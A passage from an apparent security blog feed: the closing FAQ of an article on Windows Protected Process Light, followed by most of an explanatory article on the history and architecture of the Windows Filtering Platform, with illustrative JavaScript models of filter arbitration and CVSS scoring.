What is a "protected service"?

"Protected service" is informal terminology for a Windows service whose host process runs as a PPL, with the Service Control Manager configured to launch it at a specific signer rung. The deployment plumbing (SCM service configuration, service-DLL packaging, the signing of the host binary) is what makes a service "protected." The PPL machinery is what makes the host process actually resistant to tampering. The two terms describe the same thing from different angles: one from the SCM-management view, one from the kernel-access-check view.

Will enabling LSA protection break smart-card logon?

Only if the smart-card middleware DLL is not signed at the LSA level (signer rung 4). Most major smart-card vendors have updated their middleware to be Microsoft-signed at the required level, but legacy or in-house middleware frequently fails enforcement. The recommended workflow is to run `AuditLevel = 8` for two months [@learn-runasppl], collect CodeIntegrity 3065 / 3066 events, enumerate the failing modules, re-sign or replace them, and only then switch to `RunAsPPL = 1`. Skipping the audit period is the single most common cause of authentication outages during LSA protection rollouts.

Why doesn't PPL stop a kernel-mode attacker?

Because the threat model PPL answers is *administrator-from-user-mode*, not *administrator-from-kernel-mode*. PPL is a kernel-enforced gate in the access-check pipeline, but a kernel-mode driver that can write to `EPROCESS.Protection` can zero the byte and disable the gate for any process. The defense against the kernel-mode attacker is a different mechanism: VBS-isolated credentials in VTL1 (Credential Guard), with HVCI / kernel-mode integrity controls preventing arbitrary kernel-mode code from running in the first place. PPL stops one threat; Credential Guard stops the threat one rung up; and the two are intended to be deployed together (Section 9, Section 11 Item 5).

The arc has run from a single Mimikatz error code to a kernel-enforced lattice, a third-party admission path mediated by ELAM and MVI, an arms race shaped by a single structural insight (the kernel verifies the channel and not the behaviour), and a stacked companion boundary that lives in VTL1 because VTL0 has run out of places to hide a key. PPL is not a security boundary. That classification is not a footnote; it is the most important fact about PPL, because it tells defenders that the mechanism is exactly as strong as the engineering velocity Microsoft chooses to invest in it. Deploy it. Stack it with Credential Guard. Monitor for the next bypass.

Key idea: The kernel verifies the channel. It does not verify the behaviour. Every PPL bypass since 2018 has lived in that seam, every fix has narrowed the channel, and the seam survives because behaviour is, by Rice's theorem, structurally outside what static signature verification can reason about.

Windows Filtering Platform: The Kernel-Mode Firewall You Don't See

noreply@paragmali.com (Parag Mali) — Tue, 12 May 2026 00:00:00 GMT

Open wf.msc. Right-click "Inbound Rules," click "New Rule," fill in the form, click OK. You think you just configured a firewall. What you actually did was register one filter, inside one sublayer, at one of roughly sixty filtering layers in the kernel-mode classification path of a platform you have never named. The same platform is also running IPsec, container networking, Microsoft Defender for Endpoint's network protection, and every third-party EDR's network-telemetry pipeline on the Windows host you are using right now.

The Windows Filtering Platform (WFP) is the kernel- and user-mode service Microsoft shipped with Windows Vista in November 2006 to replace four mutually-incompatible XP-era hooks: NDIS intermediate drivers, the filter-hook IOCTL on `\Device\Ipfilterdriver`, Winsock Layered Service Providers, and TDI filter drivers. It is the substrate beneath Windows Defender Firewall, Windows IPsec, WinNAT, the Hyper-V Extensible Switch, Defender for Endpoint Network Protection, and every third-party EDR's network telemetry. WFP is not a firewall. It is the platform that a firewall is one consumer of. It arbitrates competing security products deterministically through 64-bit filter weights inside priority-ordered sublayers, and that arbitration model is the load-bearing reason third-party callouts can finally coexist on the same host. The same kernel-extensibility tax that doomed the pre-WFP hooks now resurfaces as a steady drip of Base Filtering Engine elevation-of-privilege CVEs (CVE-2023-29368, CVE-2024-38034) -- the running cost of a platform sophisticated enough to host every downstream network-security feature Windows ships.

1. You Just Clicked OK on Sixty Filtering Layers

The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature is a configuration of the same engine.

That is the central claim of this article, and it is the kind of statement that sounds like marketing until you trace the actual wires. Trace them once and you stop seeing "Windows Defender Firewall" and "IPsec" and "Windows containers" as separate products. They are all clients of the same kernel/user-mode service, configuring the same filter engine, arbitrated by the same Base Filtering Engine, classified across the same approximately sixty FWPM_LAYER_* identifiers [@wfp-layers].

Windows Filtering Platform (WFP): Microsoft's cross-mode network-traffic filtering service introduced in Windows Vista and Windows Server 2008. WFP "is designed to replace previous packet filtering technologies such as Transport Driver Interface (TDI) filters, Network Driver Interface Specification (NDIS) filters, and Winsock Layered Service Providers (LSP)" [@wfp-start]. The platform has five components: the Filter Engine, the Base Filtering Engine, a set of kernel-mode shims, callout drivers, and the management API [@wfp-about].

Base Filtering Engine (BFE): A Windows service named `bfe` that, in Microsoft's own words, "controls the operation of the Windows Filtering Platform" and "plumbs configuration settings to other modules in the system. For example, IPsec negotiation polices go to IKE/AuthIP keying modules, filters go to the filter engine" [@wfp-about]. The BFE is not the Windows Firewall. The Windows Firewall is a separate service (`MpsSvc`) that talks to the BFE.

The naming is the first thing that trips readers. There is a service called BFE and a service called MpsSvc. They live in different rows of Get-Service output. They have different binary backings. The dependency arrow runs one way: MpsSvc requires BFE, never the other direction. That asymmetry, which seems pedantic, turns out to be load-bearing for the rest of the story. WFP is the platform. The firewall is a tenant.

Key idea: The firewall UI is the visible one percent of WFP. Almost every modern Windows network-security feature -- Windows Defender Firewall with Advanced Security, Windows IPsec, WinNAT and container networking, the Hyper-V Extensible Switch, Microsoft Defender for Endpoint Network Protection, every third-party EDR with a network filter -- is a configuration of the same engine [@forshaw-2021].

If WFP is the engine, what was there before it? Why did Microsoft need to build a platform when Windows XP SP2 had already shipped a firewall?

2. Before WFP -- An Internet on Fire

April 2004. Sasser is propagating through the LSASS RPC interface on port 445, infecting unpatched Windows machines within minutes of their first cable plug. Microsoft's response is four months away: Windows XP SP2, generally available on August 25, 2004, rebrands the Internet Connection Firewall as "Windows Firewall" and turns it on by default for the first time [@wiki-winfw]. As Wikipedia puts it, "the ongoing prevalence of these worms through 2004 resulted in unpatched machines being infected within a matter of minutes," and Microsoft "switched it on by default since Windows XP SP2" [@wiki-winfw]. That fixed the worm problem. It did not fix the plumbing problem.

The plumbing problem was that third-party security vendors were already hooking the Windows network stack at four different, mutually incompatible places, none of which arbitrated with the others. ZoneAlarm, Norton Internet Security, McAfee, Kerio, Check Point, BlackICE, and a dozen others were shipping kernel drivers that bolted onto Windows wherever they could find a callable surface [@wiki-winfw][@forshaw-2021]. They picked four families.

Network Driver Interface Specification (NDIS) intermediate drivers. NDIS 5.x exposed a profile called the intermediate driver that sat below the protocol stack and above the miniport. A vendor could install a driver that saw every Ethernet frame on the way up and every IP packet on the way down. The price was complexity: NDIS intermediate drivers had to participate in the entire NDIS binding state machine, and Microsoft's own documentation later admitted that the model was painful enough that the platform team replaced it with the much simpler NDIS Lightweight Filter (LWF) in NDIS 6.0 [@ndis-filter].

Filter-hook drivers on \Device\Ipfilterdriver. The IP filter driver exposed a single IOCTL, IOCTL_PF_SET_EXTENSION_POINTER, that registered a single callback function the kernel would invoke on every received or transmitted IP packet [@ipfilter-legacy]. There was one callback pointer per machine. IPv4 only. Network layer only. No documented contract for what happened when a second vendor registered.

Winsock Layered Service Providers (LSPs). A user-mode shim chained into every Winsock application, in process. LSPs had access to per-application context, but their cost was paid in blast radius: Microsoft's own categorisation guide warned that "certain system critical processes such as winlogon and lsass create sockets" and that "a number of cases have also been documented where buggy LSPs can cause lsass.exe to crash. If lsass crashes, the system forces a shutdown" [@lsp-categories].

Winsock Layered Service Provider (LSP): A user-mode DLL that chains into the Winsock service-provider stack of every process that opens a socket. LSPs were the Windows mechanism for content inspection and per-application network rules before Vista. They are still installable, but Microsoft's documentation now categorises which processes must not load them because of the lsass-crash failure mode [@lsp-categories].

TDI filter drivers. The Transport Driver Interface, the legacy kernel interface above TCP/IP, supported a filter-driver pattern that preserved application identity and could veto connections at the transport. It was the cleanest of the four options. It also stopped being a viable target the moment Microsoft deprecated TDI in Vista: "The TDI feature is deprecated and will be removed in future versions of Microsoft Windows. Depending on how you use TDI, use either the Winsock Kernel (WSK) or Windows Filtering Platform (WFP)" [@tdi-legacy].

Four hooks, four failure modes, no arbitration between any of them. In May 2006 Madhurima Pawar and Eric Stenson of Windows Networking walked the WinHEC audience through one number that captured the consequence: firewall and antivirus conflicts accounted for 12 percent of all Windows operating-system crashes [@pawar-stenson-winhec].

Reduces firewall and anti-virus crashes -- 12% of all OS crashes. -- Madhurima Pawar and Eric Stenson, WinHEC 2006 [@pawar-stenson-winhec]

That is the design motivation for WFP in ten words. The XP-era hook zoo was not a security architecture; it was a steady source of bluescreens. Microsoft's documentation, looking back at the era from Vista, reads: "Starting in Windows Server 2008 and Windows Vista, the firewall hook and the filter hook drivers are not available; applications that were using these drivers should use WFP instead" [@wfp-start]. As Forshaw later summarised it, "these firewalls were implemented by hooking into Network Driver Interface Specification (NDIS) drivers or implementing user-mode Winsock Service Providers but this was complex and error prone" [@forshaw-2021].

```mermaid
flowchart TD
  NIC[Physical NIC] --> MINI[NDIS miniport driver]
  MINI --> IM["NDIS 5.x intermediate driver<br/>(hook #1: NDIS-IM)"]
  IM --> TCPIP[TCPIP.SYS]
  TCPIP -.-> IPF["\Device\Ipfilterdriver<br/>(hook #2: filter-hook IOCTL)"]
  TCPIP --> TDI["TDI transport providers"]
  TDI --> TDIF["TDI filter driver<br/>(hook #3: TDI filter)"]
  TDIF --> AFD[AFD.SYS]
  AFD --> WS2[ws2_32.dll Winsock]
  WS2 --> LSP["Winsock LSP chain<br/>(hook #4: in-process LSP)"]
  LSP --> APP[Application]
```

So why didn't Microsoft just fix the hooks? Why a whole new platform?

3. Why Four Hooks Could Not Be Saved

Picture a Windows XP machine in 2005, four months past SP2. The user, doing what users do, installs two antivirus suites: one from a free trial that came with the laptop, one from work. Each ships a kernel driver. Each one calls IOCTL_PF_SET_EXTENSION_POINTER on \Device\Ipfilterdriver to register a packet-inspection callback [@ipfilter-legacy]. An hour later the machine bluescreens during a Windows Update download.

The Microsoft documentation for the IOCTL is precise about what the call does ("registers filter-hook callback functions to the IP filter driver to inform the IP filter driver to call those filter hook callbacks for every IP packet that is received or transmitted") and silent about what happens if a second driver makes the same call before the first one unregisters [@ipfilter-legacy]. The page does not document chaining semantics. There is no mention of a registration list, a callback array, a refcount, or a priority. The driver writers got to invent that themselves, separately, in shipped products. The crash reports speak for the result.
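Because the page documents no chaining semantics, any model of the second registration is an assumption. The sketch below models it as last-writer-wins, the outcome the sequence diagram later in this section depicts; the class `SingleSlotHook` is hypothetical and stands in for the single machine-wide callback pointer, not for the real IOCTL.

```javascript
// Hypothetical model of one machine-wide callback slot. "Last writer wins"
// is an ASSUMPTION: the documented API says nothing about a second caller.
class SingleSlotHook {
  constructor() {
    this.callback = null;
  }
  register(callback) {
    this.callback = callback; // silently replaces whoever registered before
  }
  deliver(packet) {
    return this.callback ? this.callback(packet) : 'PASS';
  }
}

const seen = [];
const hook = new SingleSlotHook();
hook.register((p) => { seen.push(`A:${p}`); return 'PASS'; }); // vendor A installs
hook.register((p) => { seen.push(`B:${p}`); return 'PASS'; }); // vendor B installs
hook.deliver('pkt1');
console.log(seen); // [ 'B:pkt1' ]: vendor A's inspection silently stopped
```

Nothing in the model reports an error: vendor A's driver is still loaded and still believes it is inspecting traffic, which is what makes the failure hard to diagnose.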

Note: Microsoft Learn documents the filter-hook registration mechanism on \Device\Ipfilterdriver exactly once, in the legacy reference for IOCTL_PF_SET_EXTENSION_POINTER [@ipfilter-legacy]. The page tells you how to register a callback. It does not tell you what happens when two callers register concurrently. That gap is the architectural bug. The 12-percent-of-OS-crashes number from WinHEC 2006 is the bill [@pawar-stenson-winhec].

Each of the four pre-WFP hooks had a specific architectural flaw. Together those flaws define what WFP had to be.

Filter-hook (IpFilterDriver). One callback pointer per machine; no arbitration; IPv4 only; network layer only. Two security products fight over one callback, and there is no documented way to chain them. Failure: arbitration impossible, vendor coexistence accidental.

NDIS 5.x intermediate driver. High complexity, no application identity (it sees frames, not processes), install-order-dependent binding chains. Microsoft's own assessment of the model, written for the LWF replacement that came in 2006, is: "Filter drivers are easier to implement and have less processing overhead than NDIS intermediate drivers" [@ndis-filter]. Failure: too low for app-aware policy, too painful to write.

TDI filter. Preserved application identity. Vetoed connections at the transport boundary. Architecturally the cleanest of the four. Then Microsoft deprecated TDI in Vista [@tdi-legacy] and the substrate evaporated. Failure: the floor disappeared.

Winsock LSP. In-process. User mode. Bypassable by any program that called Nt* system services directly. And, as the Microsoft categorisation page documents, a buggy LSP that crashes LSASS will take down the entire machine [@lsp-categories]. Failure: in process, bypassable, lethal when buggy.

Pre-WFP hook	Layer	App identity	Multi-vendor	Failure mode	Successor
Filter-hook (`IpFilterDriver`)	Network (L3)	No	No documented contract for chaining	Arbitration impossible [@ipfilter-legacy]	WFP filter at `INBOUND_IPPACKET_*`
NDIS 5.x intermediate	Data link (L2)	No	Install-order dependent	Too low for app-aware rules; complex [@ndis-filter]	NDIS Lightweight Filter (LWF)
TDI filter	Transport (L4)	Yes	Yes (chainable)	Substrate deprecated in Vista [@tdi-legacy]	WFP ALE + Winsock Kernel (WSK)
Winsock LSP	Above sockets (user mode)	Yes	Chainable in-process	In-process bypass; lsass blast radius [@lsp-categories]	WFP ALE; LSP retained for non-security uses

Walk those failure modes column by column and a design constraint set falls out. Whatever Microsoft was going to build had to:

Arbitrate multiple vendors deterministically. No more "first IOCTL wins."
Carry application identity through to the inspection point.
Concentrate inspection at one platform, not four.
Run out of process where possible. A buggy callout cannot be allowed to take down LSASS.
Resolve conflicts predictably, with rules a third-party developer can read and design against.
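The first and last constraints are the ones WFP answers with priority-ordered sublayers and 64-bit filter weights. A heavily simplified sketch of that idea, under stated assumptions: sublayers are evaluated from highest to lowest priority, the highest-weight matching filter decides within a sublayer, a block in any sublayer overrides a permit, and no match means permit. Real WFP arbitration also has override rights, callouts and per-layer behaviour that this sketch omits, and the function and filter names are hypothetical.

```javascript
// Simplified, hypothetical model of WFP-style arbitration; not the WFP API.
// Filter weights are BigInt to mirror the 64-bit weights WFP uses.
function arbitrate(sublayers, packet) {
  // Evaluate sublayers from highest to lowest priority.
  const ordered = [...sublayers].sort((a, b) => b.priority - a.priority);
  for (const sublayer of ordered) {
    // Within a sublayer, the highest-weight matching filter decides.
    const match = sublayer.filters
      .filter((f) => f.matches(packet))
      .sort((a, b) => (a.weight === b.weight ? 0 : a.weight < b.weight ? 1 : -1))[0];
    // Assumption: a block anywhere wins over a permit elsewhere.
    if (match && match.action === 'BLOCK') return { action: 'BLOCK', by: match.name };
    // A permit (or no match) falls through; a later sublayer may still block.
  }
  return { action: 'PERMIT' }; // assumption: nothing blocked means permit
}

// Two hypothetical vendors, each in its own sublayer.
const vendorA = { priority: 0x8000, filters: [
  { name: 'A-allow-https', weight: 10n, action: 'PERMIT', matches: (p) => p.port === 443 },
] };
const vendorB = { priority: 0x4000, filters: [
  { name: 'B-block-bad-ip', weight: 0xffffn, action: 'BLOCK', matches: (p) => p.ip === '203.0.113.9' },
  { name: 'B-allow-rest', weight: 1n, action: 'PERMIT', matches: () => true },
] };

console.log(arbitrate([vendorB, vendorA], { ip: '198.51.100.7', port: 443 })); // { action: 'PERMIT' }
console.log(arbitrate([vendorB, vendorA], { ip: '203.0.113.9', port: 443 }));  // { action: 'BLOCK', by: 'B-block-bad-ip' }
```

Because the inputs are sorted by priority and weight, the result does not depend on which vendor installed first, which is precisely what the single filter-hook slot could not promise.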

```mermaid
sequenceDiagram
  participant A as Vendor A installer
  participant B as Vendor B installer
  participant K as \Device\Ipfilterdriver
  participant P as IP packet path
  A->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_A)
  Note over K: callback = callback_A
  B->>K: IOCTL_PF_SET_EXTENSION_POINTER(callback_B)
  Note over K: callback = callback_B (no chaining contract)
  P->>K: packet arrives
  K->>B: callback_B(packet)
  Note over A: callback_A no longer invoked, vendor A stops working
  A->>K: re-register callback_A
  Note over K: race: pointer flips again
  K--xP: inconsistent state, BSOD
```

Vista shipped November 2006. What did the architects build to satisfy all five constraints at once?

4. The Evolution -- Five Generations of WFP

May 23-25, 2006, Seattle. Madhurima Pawar, Program Manager in Windows Networking, and Eric Stenson, Development Lead in Windows Networking, stand in front of a hostile room of third-party firewall ISVs at WinHEC and present "Windows Filtering Platform And Winsock Kernel: Next-Generation Kernel Networking APIs." Slide 6 carries the design motivation that this article opened on: 12 percent of all OS crashes are firewall and AV conflicts. Slide 7 carries the architecture diagram [@pawar-stenson-winhec]. Six months later Vista shipped, with the filter-hook and firewall-hook drivers gone from the system and a new platform in their place [@wfp-start].

Windows Vista was released to manufacturing on November 8, 2006, and made generally available to consumers on January 30, 2007 [@wiki-vista].

Generation 1: WFP v1 in Vista and Server 2008

WFP v1 introduced five named components. They are still the components the platform ships today. Microsoft's own "About Windows Filtering Platform" page enumerates them: the Filter Engine ("the core multi-layer filtering infrastructure, hosted in both kernel-mode and user-mode"); the Base Filtering Engine ("a service that controls the operation of the Windows Filtering Platform"); shims ("kernel-mode components that reside between the kernel-mode network stack and the filter engine"); callout drivers; and the management API [@wfp-about].

Filter engine: The core of WFP. Microsoft's WDK reference defines it as "a component of the Windows Filtering Platform that stores filters and performs filter arbitration. Filters are added to the filter engine at designated filtering layers so that the filter engine can perform the desired filtering action (permit, drop, or a callout). If a filter in the filter engine specifies a callout for the filter's action, the filter engine calls the callout's classifyFn function" [@wfp-filter-engine]. The engine is hosted in both kernel mode and user mode; its kernel classification path runs primarily inside `NETIO.SYS` [@forshaw-2021].

Shim: A kernel-mode bridge between a specific network stack module and the WFP filter engine. Vista shipped six shims: the Application Layer Enforcement (ALE) shim, the Transport Layer Module shim, the Network Layer Module shim, the ICMP Error shim, the Discard shim, and the Stream shim [@wfp-about]. Each shim invokes the filter engine at one or more `FWPM_LAYER_*` identifiers when traffic crosses it.

The most consequential of those six shims is ALE.

Application Layer Enforcement (ALE): "A set of Windows Filtering Platform (WFP) kernel-mode layers that are used for stateful filtering" [@wfp-ale]. ALE keeps per-connection state across packets, and -- this is the line that separates ALE from the rest of the platform -- "ALE layers are the only WFP layers where network traffic can be filtered based on the application identity -- using a normalized file name -- and based on the user identity -- using a security descriptor" [@wfp-ale]. ALE is why per-application firewall rules became possible in 2006. It is also the layer that classifies AppContainer connections in modern Windows.

ALE pays for stateful filtering with per-flow state, not per-packet work. The Microsoft Learn page makes the performance claim explicit: at ALE layers, the platform "minimally impacts network performance by processing only the first packet in a connection" [@wfp-about]. Subsequent packets ride the existing flow state. That choice is what lets a per-process firewall rule scale to gigabit network rates.
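The first-packet-only design can be sketched as a flow cache. This is a minimal sketch, not the ALE implementation. It assumes a 5-tuple flow key and a caller-supplied classify function, both hypothetical stand-ins for the ALE shim and the filter engine. It counts how many times the expensive classification actually runs.

```javascript
// Minimal sketch: classify the first packet of a flow, then reuse the verdict.
// makeFlowTable, the 5-tuple key, and the classify callback are hypothetical
// stand-ins for the ALE shim and the filter engine.
function makeFlowTable(classify) {
  const flows = new Map(); // flow key -> cached verdict (the per-flow state)
  let classifications = 0;
  return {
    onPacket(pkt) {
      const key = `${pkt.proto}|${pkt.src}:${pkt.sport}|${pkt.dst}:${pkt.dport}`;
      if (!flows.has(key)) {
        classifications += 1; // first packet: full filter-engine walk
        flows.set(key, classify(pkt));
      }
      return flows.get(key); // later packets: a single map lookup
    },
    get classifications() {
      return classifications;
    },
  };
}

// Hypothetical per-application rule: block chrome.exe on port 443.
const table = makeFlowTable((p) => (p.app === 'chrome.exe' && p.dport === 443 ? 'Block' : 'Permit'));
const pkt = { proto: 'tcp', src: '10.0.0.2', sport: 50000, dst: '203.0.113.5', dport: 443, app: 'chrome.exe' };

const verdicts = [];
for (let i = 0; i < 1000; i++) verdicts.push(table.onPacket(pkt));
console.log(verdicts[999], table.classifications); // Block 1
```

A thousand packets cost one classification plus 999 map lookups. The memory for the flow table is the price paid for that.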

April 12, 2010. Microsoft ships a Windows Filtering Platform driver hotfix rollup, KB981889, that bundles three previously-separate fixes into one package. The Microsoft Support page enumerates them verbatim [@kb981889]:

KB976759 -- "WFP drivers may cause a failure to disconnect the RDP connection to a multiprocessor computer."

KB979278 -- "Using two Windows Filtering Platform (WFP) drivers causes a computer to crash."

KB979223 -- "A nonpaged pool memory leak occurs when you use a WFP callout driver."

Read KB979278 again. Two WFP drivers cause a crash. The XP-era "two AV vendors fight" bug had survived into the new platform, in a different shape: the WFP arbitration model held -- the conflict between filters was deterministic -- but the callout driver lifecycle had not yet been hardened. That distinction is the structural seed of the BFE elevation-of-privilege CVE class more than a decade later. Section 8 returns to it.

Generation 2: WFP v2 in Windows 8 and Server 2012

Windows 8 and Server 2012 shipped a refresh in 2012. The "What's New in Windows Filtering Platform" page enumerates the delta in four bullets [@wfp-whatsnew]:

"Layer 2 filtering: Provides access to the L2 (MAC) layer, allowing filtering of traffic at that layer."
"vSwitch filtering: Allows packets traversing a vSwitch to be inspected and/or modified. WFP filters or callouts can be used at the vSwitch ingress and egress."
"App container management: Allows access to information about app containers and network isolation connectivity issues."
"IPsec updates: Extended IPsec functionality including connection state monitoring, certificate selection, and key management." [@wfp-whatsnew]

Four features, but the second one -- vSwitch filtering -- is the architecturally significant one. With Windows 8, WFP reached into the Hyper-V Extensible Switch. From that release forward, every Hyper-V VM's packet path is a WFP-extensible classification problem, and the same kernel-mode platform that filters host traffic can also filter tenant traffic [@wfp-whatsnew].

Generation 3: Windows 10 ALE redirection (2015-2021)

The Windows 10 family added two ALE layers that did not exist in Vista: CONNECT_REDIRECT and BIND_REDIRECT. The "ALE Layers" page lists them at the bottom of its enumeration [@wfp-ale-layers]. Their job is exactly what their names say -- redirect an outbound connection (proxy it through a different address), or redirect a bind (force a process to bind to a different local endpoint). Web proxies, transparent forwarders, and AppContainer policy now had a kernel-side hook that did not exist before. Forshaw's 2021 Project Zero post documents the modern Windows Defender Firewall pipeline end to end: "MPSSVC converts its ruleset to the lower-level WFP firewall filters and sends them over RPC to the Base Filtering Engine (BFE) service. These filters are then uploaded to the TCP/IP driver (TCPIP.SYS) in the kernel... The evaluation is handled primarily by the NETIO driver as well as registered callout drivers" [@forshaw-2021].
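Connect redirection reduces to "rewrite the destination, remember the original." This is a minimal sketch under stated assumptions. `makeConnectRedirector`, `onConnect`, and `lookupOriginal` are hypothetical and are not WFP functions. The proxy address and the port-80 policy are illustrative. The remembered original destination stands in for the state a transparent proxy needs in order to reach the real server.

```javascript
// Hypothetical model of connect redirection (none of these names are WFP
// APIs): the remote endpoint is rewritten to a local proxy, and the original
// destination is kept so the proxy can look it up after accepting.
function makeConnectRedirector(proxy, shouldRedirect) {
  const originalDestinations = new Map(); // "src:sport" -> original remote endpoint
  return {
    onConnect(conn) {
      if (!shouldRedirect(conn)) return conn; // leave the connection untouched
      originalDestinations.set(`${conn.src}:${conn.sport}`, { addr: conn.dst, port: conn.dport });
      return { ...conn, dst: proxy.addr, dport: proxy.port };
    },
    // What the proxy would call once it accepts the redirected connection.
    lookupOriginal(src, sport) {
      return originalDestinations.get(`${src}:${sport}`) ?? null;
    },
  };
}

const redirector = makeConnectRedirector({ addr: '127.0.0.1', port: 8080 }, (c) => c.dport === 80);
const rewritten = redirector.onConnect({ src: '10.0.0.2', sport: 50001, dst: '198.51.100.7', dport: 80 });
console.log(rewritten.dst, rewritten.dport);               // 127.0.0.1 8080
console.log(redirector.lookupOriginal('10.0.0.2', 50001)); // { addr: '198.51.100.7', port: 80 }
```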

Generation 4: URO and the CVE drumbeat (2022-2024)

The most recent generation comes in two parallel tracks. The first is a hardware offload feature. NDIS 6.89, the version of the NDIS driver interface that "is included in Windows 11, version 24H2 and Windows Server 2022 and later," adds support for UDP Receive Segment Coalescing Offload (URO): "this hardware offload enables NICs to coalesce UDP receive segments. NICs can combine UDP datagrams from the same flow that match a set of rules into a logically contiguous buffer. These combined datagrams are then indicated to the Windows networking stack as a single large packet" [@ndis-689]. Windows 11 24H2 reached general availability on October 1, 2024 [@wiki-win11-24h2].
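Here is a minimal sketch of receive-side coalescing, to make the quoted definition concrete. The coalescing rules are an assumption for illustration, not the NDIS 6.89 specification: datagrams must share a flow, must be equal in size, and a shorter datagram may appear only at the end of a batch. `coalesceUdp` is a hypothetical helper; a NIC does this work in hardware.

```javascript
// Hypothetical receive-side UDP coalescing. Assumed rules (an illustration, not
// the NDIS specification): consecutive datagrams join a batch only if they share
// a flow key and are no larger than the first one; a shorter datagram ends it.
function coalesceUdp(datagrams) {
  const batches = [];
  let batch = null;
  for (const d of datagrams) {
    const canJoin =
      batch !== null && !batch.closed && batch.flow === d.flow && d.payload.length <= batch.segmentSize;
    if (canJoin) {
      batch.payload = Buffer.concat([batch.payload, d.payload]); // one contiguous buffer
      batch.count += 1;
      if (d.payload.length < batch.segmentSize) batch.closed = true; // short tail ends the batch
    } else {
      if (batch) batches.push(batch);
      batch = { flow: d.flow, segmentSize: d.payload.length, payload: d.payload, count: 1, closed: false };
    }
  }
  if (batch) batches.push(batch);
  // One indication per batch: a single large buffer plus the segment size.
  return batches.map(({ flow, segmentSize, payload, count }) => ({ flow, segmentSize, bytes: payload.length, count }));
}

const dg = (flow, n) => ({ flow, payload: Buffer.alloc(n) });
const indications = coalesceUdp([dg('A', 1200), dg('A', 1200), dg('A', 1200), dg('A', 500), dg('B', 1200), dg('A', 1200)]);
console.log(indications.map((i) => `${i.flow}:${i.count}x${i.segmentSize}=${i.bytes}`).join(' '));
// A:4x1200=4100 B:1x1200=1200 A:1x1200=1200
```

Six datagrams reach the stack as three indications. The first indication carries four datagrams in one 4,100-byte buffer.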

The second track is a sequence of elevation-of-privilege CVEs in the Base Filtering Engine. CVE-2023-29368, published June 14, 2023, is a CWE-415 double-free with a CVSS base of 7.0 [@nvd-2023-29368]. CVE-2024-38034, published July 9, 2024, is a CWE-190 integer overflow with a CVSS base of 7.8 [@nvd-2024-38034]. Attack complexity dropped from AC:H (high) for the 2023 vulnerability to AC:L (low) for the 2024 one, and the exploitability sub-score rose from 1.0 to 1.8 over the same interval [@nvd-2023-29368][@nvd-2024-38034]. On these two data points, BFE EoP is getting easier to weaponise, not harder.
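Both scores can be reproduced from the CVSS v3.1 base equations. This is a minimal sketch that assumes full vectors the text does not state. Apart from the AC metric, the vector AV:L/PR:L/UI:N/S:U/C:H/I:H/A:H is an assumption. It was chosen because it reproduces both published numbers, not copied from the NVD records. The weights and the Roundup rule follow the FIRST CVSS v3.1 specification, and the sketch handles unchanged scope only.

```javascript
// CVSS v3.1 base-score arithmetic, Scope:Unchanged only. Weights are the
// published v3.1 constants (PR values are the scope-unchanged ones).
const W = {
  AV: { N: 0.85, A: 0.62, L: 0.55, P: 0.2 },
  AC: { L: 0.77, H: 0.44 },
  PR: { N: 0.85, L: 0.62, H: 0.27 },
  UI: { N: 0.85, R: 0.62 },
  CIA: { H: 0.56, L: 0.22, N: 0 },
};

// Spec-defined Roundup: smallest one-decimal number >= x, robust to float noise.
function roundUp(x) {
  const i = Math.round(x * 100000);
  return i % 10000 === 0 ? i / 100000 : (Math.floor(i / 10000) + 1) / 10;
}

function cvss31(vector) {
  const m = Object.fromEntries(vector.split('/').map((kv) => kv.split(':')));
  if (m.S !== 'U') throw new Error('this sketch handles Scope:Unchanged only');
  const exploitability = 8.22 * W.AV[m.AV] * W.AC[m.AC] * W.PR[m.PR] * W.UI[m.UI];
  const iss = 1 - (1 - W.CIA[m.C]) * (1 - W.CIA[m.I]) * (1 - W.CIA[m.A]);
  const impact = 6.42 * iss;
  const base = impact <= 0 ? 0 : roundUp(Math.min(impact + exploitability, 10));
  return { base, exploitability: Math.round(exploitability * 10) / 10 };
}

console.log(cvss31('AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H')); // { base: 7, exploitability: 1 }
console.log(cvss31('AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H')); // { base: 7.8, exploitability: 1.8 }
```

With everything else held fixed, changing AC:H to AC:L raises the AC weight from 0.44 to 0.77. That change alone moves exploitability from about 1.05 to about 1.83, and the base score from 7.0 to 7.8.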

flowchart TD
    UM["User-mode application<br/>(e.g. wf.msc / netsh / MpsSvc)"] --> API["Fwpm* management API<br/>(fwpuclnt.dll)"]
    API --> BFE["Base Filtering Engine service<br/>(bfe, user mode)"]
    BFE --> FE["Filter Engine<br/>(kernel + user mode)"]
    FE --> KCLI["fwpkclnt.sys<br/>(kernel-mode WFP client / export driver)"]
    FE --> NETIO["NETIO.SYS<br/>(classification path)"]
    NETIO --> ALE["ALE shim"]
    NETIO --> TLM["Transport-Layer shim"]
    NETIO --> NLM["Network-Layer shim"]
    NETIO --> STREAM["Stream shim"]
    NETIO --> ICMP["ICMP-Error shim"]
    NETIO --> DISC["Discard shim"]
    ALE --> COUT["Callout drivers<br/>(IPsec, in-box stealth, EDR, 3rd-party)"]
    TLM --> COUT
    NLM --> COUT
    STREAM --> COUT
    ICMP --> COUT
    DISC --> COUT

timeline
    title Five generations of the Windows Filtering Platform
    2006-11 : Windows Vista / Server 2008 -- WFP v1 (filter engine, BFE, six shims, callouts)
    2010-04 : KB981889 hotfix rollup -- three named WFP driver bugs, including two-WFP-drivers crash
    2012-09 : Windows 8 / Server 2012 -- WFP v2 (L2, vSwitch, AppContainer, IPsec extensions)
    2015-21 : Windows 10 -- ALE CONNECT_REDIRECT / BIND_REDIRECT, AppContainer-aware ALE
    2023-06 : CVE-2023-29368 published (CWE-415 double-free, CVSS 7.0)
    2024-07 : CVE-2024-38034 published (CWE-190 integer overflow, CVSS 7.8)
    2024-10 : Windows 11 24H2 -- NDIS 6.89 adds URO (UDP receive coalescing)

Timeline sources, in row order: WinHEC 2006 and the Vista release on the Microsoft Learn WFP start page [@pawar-stenson-winhec][@wfp-start]; KB981889 [@kb981889]; the "What's New" page [@wfp-whatsnew]; ALE Layers [@wfp-ale-layers] and Forshaw 2021 [@forshaw-2021]; the NVD records for CVE-2023-29368 and CVE-2024-38034 [@nvd-2023-29368][@nvd-2024-38034]; NDIS 6.89 introduction and the Windows 11 24H2 GA date [@ndis-689][@wiki-win11-24h2].

Five generations, one engine, no replacements. Why does the same engine still ship in 2026? What is the architectural insight that made it last?

5. Sublayers, Weights, and Veto -- The Arbitration Insight

